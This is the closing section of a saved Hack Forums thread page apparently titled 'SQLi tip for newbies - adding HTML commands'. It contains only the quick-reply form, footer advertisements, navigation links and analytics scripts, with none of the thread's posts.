					<label><input type="checkbox" class="checkbox" name="postoptions[disablesmilies]" value="1">&nbsp;<strong>Disable Smilies</strong></label></span>
				</td>
				<td class="trow1">
					<div style="width: 95%">
						<textarea style="width: 100%; padding: 4px; margin: 0;" rows="8" cols="80" name="message" id="message" tabindex="1"></textarea>
					</div>
					<div class="editor_control_bar" style="width: 95%; padding: 4px; margin-top: 3px; display: none;" id="quickreply_multiquote">
						<span class="smalltext">
							You have selected one or more posts to quote. <a href="http://www.hackforums.net/newreply.php?tid=2798495&load_all_quotes=1" onclick="return Thread.loadMultiQuoted();">Quote these posts now</a> or <a href="javascript:Thread.clearMultiQuoted();">deselect them</a>.
						</span>
					</div>
				</td>
			</tr>
			
			<tr>
				<td colspan="2" align="center" class="tfoot"><input type="submit" class="button" value="Post Reply" tabindex="2" accesskey="s" id="quick_reply_submit"> <input type="submit" class="button" name="previewpost" value="Preview Post" tabindex="3"></td>
			</tr>
		</tbody>
	</table>
</form>
<!-- end: showthread_quickreply -->
	
	
	<br>
	<div class="float_left">
		<ul class="thread_tools">
			<li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=2798495">View a Printable Version</a></li>
			<!-- // <li class="sendthread"><a href="sendthread.php?tid=2798495" rel="nofollow">Send this Thread to a Friend</a></li> -->
			<li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&tid=2798495&my_post_key=111c6251d6ef052e4fa64dde874f3290" rel="nofollow">Subscribe to this thread</a></li>
		</ul>
	</div>

	<div class="float_right" style="text-align: right;">
		
		
	</div>
	<br style="clear: both;">
	
	<!-- start: footer --><div class="footerad" align="center"><a href="http://www.hackforums.net/showthread.php?tid=4058259" title="infinity"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/infinity.gif" alt="infinity"></a><!--// till March 18 -->
<br><br>
<a href="http://adf.ly/?id=5613" title="Ad Fly"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/adfly_88x31.gif" alt="Ad Fly"></a>
<a href="https://coinbase.com/?r=51a12a737f4067e7b7000020&utm_campaign=user-referral&src=referral-link" title="Coinbase"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/coinbase.png" alt="Coinbase"></a>
<a href="https://www.digitalocean.com/?refcode=525b78627715" title="Digital Ocean"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/digital-ocean.gif" alt="Digital Ocean"></a>
<br></div>
</div><br>
			<div class="bottommenu">
				<div>
					<span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-2798495.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a>  | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&hid=12">Legal Policies</a> | <a href="http://www.hackforums.net/showthread.php?tid=2798495#top">Top</a></span>
				</div>


			</div>
<br>

			</div>
		<hr class="hidden">
			<div id="copyright">
				<div id="debug"></div>
<br class="clear">

<script type="text/javascript">if(MyBB) { Event.observe(window, 'load', function() { MyBB.detectDSTChange('-8'); }); }</script>

		</div>
		</div>
<br>
<!-- end: footer -->

<script src="./SQLi tip for newbies - adding HTML commands - Page 1_files/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-249290-34";
urchinTracker();
</script>


<!-- end: showthread --></body></html>